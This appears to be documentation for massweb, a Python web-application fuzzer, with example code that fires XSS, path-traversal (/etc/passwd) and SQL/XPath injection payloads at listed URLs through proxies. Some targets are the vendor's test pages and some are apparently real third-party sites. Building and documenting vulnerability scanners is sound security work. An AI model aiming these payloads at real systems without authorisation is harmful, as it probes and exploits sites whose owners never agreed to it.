*massweb is currently beta-level software; we encourage you to submit bugs by emailing contact@hyperiongray.com.

The Problem it Solves

In PunkSPIDER 3.0 (the release we're currently working on) we have to scan several hundred million hosts in a very short amount of time over a Hadoop distributed cluster. There are a few big challenges with this:

...

Web App Fuzzing Example 1

    # Python 2 syntax (print statements), as in the original example.
    from massweb.fuzzers.web_fuzzer import WebFuzzer
    from massweb.payloads.payload import Payload

    # Each payload is tagged with the check type(s) it tests for.
    xss_payload = Payload('"><ScRipT>alert(31337)</ScrIpT>', check_type_list = ["xss"])
    trav_payload = Payload('../../../../../../../../../../../../../../../../../../etc/passwd', check_type_list = ["trav"])
    sqli_xpathi_payload = Payload("')--", check_type_list = ["sqli", "xpathi"])

    # Create the fuzzer, register the payloads, then add targets by URL.
    wf = WebFuzzer(num_threads = 30, time_per_url = 5, proxy_list = [{"http":"http://user:password@10.0.0.1:3089/"}, {"http":"http://user:password@10.0.0.2:3089/"}])
    wf.add_payload(xss_payload)
    wf.add_payload(trav_payload)
    wf.add_payload(sqli_xpathi_payload)
    wf.add_target_from_url("http://course.hyperiongray.com/vuln1")
    wf.add_target_from_url("http://course.hyperiongray.com/vuln2/898538a7335fd8e6bac310f079ba3fd1/")
    wf.add_target_from_url("http://www.wpsurfing.co.za/?feed=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E")
    wf.add_target_from_url("http://www.sfgcd.com/ProductsBuy.asp?ProNo=1%3E&ProName=1")
    wf.add_target_from_url("http://www.gayoutdoors.com/page.cfm?snippetset=yes&typeofsite=snippetdetail&ID=1368&Sectionid=1")
    wf.add_target_from_url("http://www.dobrevsource.org/index.php?id=1")

    print "Targets list pre post determination:"
    for target in wf.targets:
        print target

    # Look for additional (POST) injection points on the targets.
    print "Targets list after additional injection points have been found:"
    wf.determine_posts_from_targets()
    for target in wf.targets:
        print target.url, target.data

    # Combine targets and payloads into individual fuzzing requests.
    print "FuzzyTargets list:"
    wf.generate_fuzzy_targets()
    for ft in wf.fuzzy_targets:
        print ft, ft.ttype, ft.data

    # Send the requests and print each result with its target type and payload.
    print "Results of our fuzzing:"
    for r in wf.fuzz():
        print r, r.fuzzy_target.ttype, r.fuzzy_target.payload

...

Let's run through the above code. First we create Payload objects, each taking the payload string and a check type list. The check_type_list marks the vulnerability or vulnerabilities that your payload is testing for; valid values are: mxi (mail header injection), osci (OS command injection), sqli (SQL injection), trav (path traversal), xpathi (XPath injection), and xss (cross-site scripting). The first two payloads test for XSS and path traversal, while the third is a valid payload for both SQL injection and XPath injection. Then we instantiate the WebFuzzer() object, passing in some of our favorite parameters, num_threads and time_per_url, and add the payloads to it. Next up, we add our targets. In the above we chose to add targets via a URL, but this could also be done by creating a Target object and using the .add_target() method, which would look something like the following:

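    from massweb.fuzzers.web_fuzzer import WebFuzzer
    from massweb.targets.target import Target  # module path assumed; not shown on this page

    wf = WebFuzzer()
    # A plain URL target, then a POST target with form data.
    target_1 = Target("http://www.hyperiongray.com")
    target_2 = Target("http://course.hyperiongray.com/vuln1", data = {"password" : "blah"}, ttype = "post")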
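
How a target and a tagged payload combine into individual test cases, as an added stand-alone Python 3 example that is not massweb's own code: it replaces one parameter at a time in a GET query string or a POST body and carries the payload's check types along. The names `validate_check_types` and `expand_target`, the `app.example.test` host and the one-parameter-at-a-time strategy are assumptions for illustration; the set of valid check types is the one listed in the text above.

```python
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Check types the text above lists as valid for check_type_list.
VALID_CHECK_TYPES = {"mxi", "osci", "sqli", "trav", "xpathi", "xss"}

def validate_check_types(check_type_list):
    """Return a copy of the list; raise ValueError if it is empty or has unknown types."""
    unknown = sorted(set(check_type_list) - VALID_CHECK_TYPES)
    if unknown or not check_type_list:
        raise ValueError("invalid check_type_list: {!r}".format(unknown or check_type_list))
    return list(check_type_list)

def expand_target(url, payloads, data=None, ttype="get"):
    """Return (ttype, url, data, param, check_types) tuples, one per parameter and payload."""
    if ttype not in ("get", "post"):
        raise ValueError("unknown ttype: {!r}".format(ttype))
    parts = urlsplit(url)
    query = parse_qsl(parts.query, keep_blank_values=True)
    variants = []
    for payload, check_type_list in payloads:
        check_types = validate_check_types(check_type_list)
        if ttype == "get":
            # Replace one query parameter per variant; the others keep their values,
            # so a result can be attributed to a single input.
            for i, (name, _) in enumerate(query):
                fuzzed = query[:i] + [(name, payload)] + query[i + 1:]
                fuzzed_url = urlunsplit(parts._replace(query=urlencode(fuzzed)))
                variants.append(("get", fuzzed_url, None, name, check_types))
        else:
            for name in (data or {}):
                fuzzed_data = {**data, name: payload}
                variants.append(("post", url, fuzzed_data, name, check_types))
    return variants

# Constructed sample input: a reserved .test host and a payload string from this page.
PAYLOADS = [("')--", ["sqli", "xpathi"])]

def demo():
    """Expand one GET target and one POST target with the sample payload."""
    get_variants = expand_target("http://app.example.test/item?id=1&lang=en", PAYLOADS)
    post_variants = expand_target("http://app.example.test/login", PAYLOADS,
                                  data={"user": "a", "password": "blah"}, ttype="post")
    return get_variants, post_variants

if __name__ == "__main__":
    print(*[variant for group in demo() for variant in group], sep="\n")
```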

...